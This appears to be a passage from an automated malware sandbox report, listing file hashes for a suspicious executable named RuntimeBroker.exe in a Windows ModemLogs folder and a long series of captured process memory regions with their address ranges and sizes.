                                            862845ec5e978462d3aecedd11527e88f57bcc0170780cae1400c7c69e1c8cfe8e0a6965d3bafd85878a28e925d27d2fcfd0203acb3145b160d47965e628dbb7

                                          • C:\Windows\ModemLogs\RuntimeBroker.exe

                                            Filesize

                                            5.1MB

                                            MD5

                                            f951a038ccf22cc14b8b5fd43e201d23

                                            SHA1

                                            76b54f2ae80fa5a93b0b87ade82ee09bd04a0caf

                                            SHA256

                                            c90c50d1f3006568c150cea12d38feaea65395ce90aeaf974cfe1006bc2a5a0c

                                            SHA512

                                            a76c44882d60349fa65d0487f45f6c9571e04e29b0d072228e0f5f9dce315fd8aaed06f1e2a9f2554cdb7071fb75935e5a16c8b7a455eb827919c01f1749343a

                                          • memory/1196-132-0x000000001B360000-0x000000001B36C000-memory.dmp

                                            Filesize

                                            48KB

                                          • memory/1196-137-0x000000001B380000-0x000000001B38C000-memory.dmp

                                            Filesize

                                            48KB

                                          • memory/1196-141-0x000000001B230000-0x000000001B240000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/1196-138-0x00007FFD6AFB0000-0x00007FFD6BA71000-memory.dmp

                                            Filesize

                                            10.8MB

                                          • memory/1196-140-0x00007FFD88F50000-0x00007FFD88F51000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1196-139-0x00007FFD88F60000-0x00007FFD88F61000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1196-135-0x000000001B370000-0x000000001B37E000-memory.dmp

                                            Filesize

                                            56KB

                                          • memory/1196-128-0x00007FFD88FE0000-0x00007FFD88FE1000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1196-133-0x00007FFD88FD0000-0x00007FFD88FD1000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1196-130-0x000000001B200000-0x000000001B20E000-memory.dmp

                                            Filesize

                                            56KB

                                          • memory/1196-126-0x000000001B1F0000-0x000000001B1FE000-memory.dmp

                                            Filesize

                                            56KB

                                          • memory/1196-127-0x00007FFD88FF0000-0x00007FFD88FF1000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1196-124-0x00007FFD89000000-0x00007FFD89001000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1196-121-0x00007FFD89010000-0x00007FFD89011000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1196-123-0x000000001B340000-0x000000001B358000-memory.dmp

                                            Filesize

                                            96KB

                                          • memory/1196-120-0x000000001B390000-0x000000001B3E0000-memory.dmp

                                            Filesize

                                            320KB

                                          • memory/1196-116-0x000000001B230000-0x000000001B240000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/1196-119-0x00007FFD89030000-0x00007FFD890EE000-memory.dmp

                                            Filesize

                                            760KB

                                          • memory/1196-118-0x000000001B210000-0x000000001B22C000-memory.dmp

                                            Filesize

                                            112KB

                                          • memory/1196-114-0x00007FFD89030000-0x00007FFD890EE000-memory.dmp

                                            Filesize

                                            760KB

                                          • memory/1196-115-0x00007FFD89020000-0x00007FFD89021000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1196-113-0x00000000025B0000-0x00000000025BE000-memory.dmp

                                            Filesize

                                            56KB

                                          • memory/1196-111-0x000000001B230000-0x000000001B240000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/1196-110-0x000000001B230000-0x000000001B240000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/1196-109-0x0000000000A80000-0x0000000000A81000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1196-108-0x00007FFD6AFB0000-0x00007FFD6BA71000-memory.dmp

                                            Filesize

                                            10.8MB

                                          • memory/1196-107-0x00000000002E0000-0x00000000004E4000-memory.dmp

                                            Filesize

                                            2.0MB

                                          • memory/1504-324-0x0000000140000000-0x000000014000E000-memory.dmp

                                            Filesize

                                            56KB

                                          • memory/1504-323-0x0000000140000000-0x000000014000E000-memory.dmp

                                            Filesize

                                            56KB

                                          • memory/1504-327-0x0000000140000000-0x000000014000E000-memory.dmp

                                            Filesize

                                            56KB

                                          • memory/1504-329-0x0000000140000000-0x000000014000E000-memory.dmp

                                            Filesize

                                            56KB

                                          • memory/1504-326-0x0000000140000000-0x000000014000E000-memory.dmp

                                            Filesize

                                            56KB

                                          • memory/1504-325-0x0000000140000000-0x000000014000E000-memory.dmp

                                            Filesize

                                            56KB

                                          • memory/2644-6-0x0000000000AE0000-0x000000000148A000-memory.dmp

                                            Filesize

                                            9.7MB

                                          • memory/2644-0-0x0000000000AE0000-0x000000000148A000-memory.dmp

                                            Filesize

                                            9.7MB

                                          • memory/2644-11-0x00000000740C0000-0x0000000074870000-memory.dmp

                                            Filesize

                                            7.7MB

                                          • memory/2644-2-0x00000000740C0000-0x0000000074870000-memory.dmp

                                            Filesize

                                            7.7MB

                                          • memory/2644-3-0x0000000000AE0000-0x000000000148A000-memory.dmp

                                            Filesize

                                            9.7MB

                                          • memory/2644-4-0x0000000000AE0000-0x000000000148A000-memory.dmp

                                            Filesize

                                            9.7MB

                                          • memory/2644-1-0x000000007F830000-0x000000007FC01000-memory.dmp

                                            Filesize

                                            3.8MB

                                          • memory/2644-9-0x000000007F830000-0x000000007FC01000-memory.dmp

                                            Filesize

                                            3.8MB

                                          • memory/4448-54-0x0000000007680000-0x00000000076A2000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/4448-30-0x0000000006570000-0x00000000065A2000-memory.dmp

                                            Filesize

                                            200KB

                                          • memory/4448-49-0x00000000074E0000-0x00000000074F1000-memory.dmp

                                            Filesize

                                            68KB

                                          • memory/4448-48-0x00000000075B0000-0x0000000007646000-memory.dmp

                                            Filesize

                                            600KB

                                          • memory/4448-47-0x0000000007350000-0x000000000735A000-memory.dmp

                                            Filesize

                                            40KB

                                          • memory/4448-46-0x00000000072F0000-0x000000000730A000-memory.dmp

                                            Filesize

                                            104KB

                                          • memory/4448-45-0x0000000007930000-0x0000000007FAA000-memory.dmp

                                            Filesize

                                            6.5MB

                                          • memory/4448-51-0x0000000007530000-0x0000000007544000-memory.dmp

                                            Filesize

                                            80KB

                                          • memory/4448-43-0x0000000004C00000-0x0000000004C10000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/4448-44-0x0000000006F90000-0x0000000007033000-memory.dmp

                                            Filesize

                                            652KB

                                          • memory/4448-42-0x0000000004C00000-0x0000000004C10000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/4448-28-0x0000000005FD0000-0x000000000601C000-memory.dmp

                                            Filesize

                                            304KB

                                          • memory/4448-41-0x0000000006F70000-0x0000000006F8E000-memory.dmp

                                            Filesize

                                            120KB

                                          • memory/4448-31-0x0000000075170000-0x00000000751BC000-memory.dmp

                                            Filesize

                                            304KB

                                          • memory/4448-29-0x000000007FBD0000-0x000000007FBE0000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/4448-50-0x0000000007520000-0x000000000752E000-memory.dmp

                                            Filesize

                                            56KB

                                          • memory/4448-10-0x0000000004C00000-0x0000000004C10000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/4448-8-0x00000000740C0000-0x0000000074870000-memory.dmp

                                            Filesize

                                            7.7MB

                                          • memory/4448-52-0x0000000007570000-0x000000000758A000-memory.dmp

                                            Filesize

                                            104KB

                                          • memory/4448-53-0x0000000007560000-0x0000000007568000-memory.dmp

                                            Filesize

                                            32KB

                                          • memory/4448-13-0x0000000005240000-0x0000000005868000-memory.dmp

                                            Filesize

                                            6.2MB

                                          • memory/4448-55-0x0000000008560000-0x0000000008B04000-memory.dmp

                                            Filesize

                                            5.6MB

                                          • memory/4448-27-0x0000000005FA0000-0x0000000005FBE000-memory.dmp

                                            Filesize

                                            120KB

                                          • memory/4448-26-0x0000000005BC0000-0x0000000005F14000-memory.dmp

                                            Filesize

                                            3.3MB

                                          • memory/4448-16-0x0000000005950000-0x00000000059B6000-memory.dmp

                                            Filesize

                                            408KB

                                          • memory/4448-82-0x00000000740C0000-0x0000000074870000-memory.dmp

                                            Filesize

                                            7.7MB

                                          • memory/4448-15-0x00000000058E0000-0x0000000005946000-memory.dmp

                                            Filesize

                                            408KB

                                          • memory/4448-14-0x0000000005100000-0x0000000005122000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/4448-12-0x0000000004C00000-0x0000000004C10000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/4448-7-0x0000000004A10000-0x0000000004A46000-memory.dmp

                                            Filesize

                                            216KB